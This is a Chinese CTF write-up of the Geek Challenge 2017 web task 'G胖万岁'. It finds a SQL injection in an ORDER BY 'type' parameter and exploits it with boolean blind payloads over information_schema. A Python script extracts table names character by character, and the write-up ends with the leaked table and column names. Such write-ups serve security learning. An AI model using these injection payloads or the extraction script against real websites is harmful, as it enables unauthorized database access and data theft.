[极客大挑战2017](Web)G胖万岁

题目链接 : http://game.sycsec.com:2008/Steam/1.php?type=DESC

image.png

看到 URL 中的 DESC 参数联想到 SQL 语句中的 Order By 语法
姑且认为是 MySQL
查了一下 MySQL 的语法 :

https://dev.mysql.com/doc/refman/5.7/en/sorting-rows.html
https://dev.mysql.com/doc/refman/5.7/en/order-by-optimization.html

select username, password from users order by username desc

image.png

尝试测试 :

select username, password from users order by password, username desc
http://game.sycsec.com:2008/Steam/1.php?type=ASC

发现两者返回顺序不同
应该就是这里的注入点了

%YI3YPL9GH(GCU%}RQG75VO.png

![](9RQ%0TGP.png](http://upload-images.jianshu.io/upload_images/2355077-fa3aac873238760d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

image.png

还是没有深入阅读 MySQL 的文档 , 太菜了 , Order By 只能用于 union 之后

那么应该是只能盲注了 , 盲注需要构造一个可控的 Boolean
参考文章 :

http://www.cnblogs.com/REscan/p/6884278.html

image.png

http://game.sycsec.com:2008/Steam/1.php?type=,1%23 # 返回正常
http://game.sycsec.com:2008/Steam/1.php?type=,0%23 # SQL 执行出错

http://game.sycsec.com:2008/Steam/1.php?type=,user%23 # 返回空 , 说明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,username%23 # 返回空 , 说明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,score%23 # 返回正常 , 列名存在

找到一个可用 Payload :

http://game.sycsec.com:2008/Steam/1.php?type=,(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)%3C0x55,1,0x00))%23

(select 1 regexp if(1,1,0x00))
(select 1 regexp if(1,1,0))

测试了一个小时 , 就是找不到什么上面的 Payload 可以而下面的不行 , 想要骂娘了, *&()^#@()!)&S

脚本 :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

def check(content):
    return "Terraria" in content

def guess(url):
    response = requests.get(url)
    content = response.content
    return check(content)

data = ""
for i in range(0x20):
    LEFT = 0x00
    RIGHT = 0x100
    P = (RIGHT + LEFT) / 2
    while RIGHT - LEFT > 1:
        url = "http://game.sycsec.com:2008/Steam/1.php?type=,(select 1 regexp if(ascii(substring((select concat(table_name)from information_schema.tables where table_schema%3ddatabase() limit 0,1),"+str(i)+",1))%3c"+hex(P)+",1,0x00))%23"
        print "[+] Payload : %s" % (url)
        print "[%d]>>>>[%d]<<<<[%d]" % (LEFT, P, RIGHT)
        if guess(url):
            RIGHT = P
        else:
            LEFT = P
        P = (RIGHT + LEFT) / 2
    data += chr(P)
    print "[+] Data : %s" % (data)

[+] Tables : F1AG_1S_H3RE,GAMES
[+] Columns : ID,F14G_IS,ID,NAME,TIMES,SCORE,ACHIEVEMENT,PRICE

[极客大挑战2017](Web)G胖万岁

推荐阅读更多精彩内容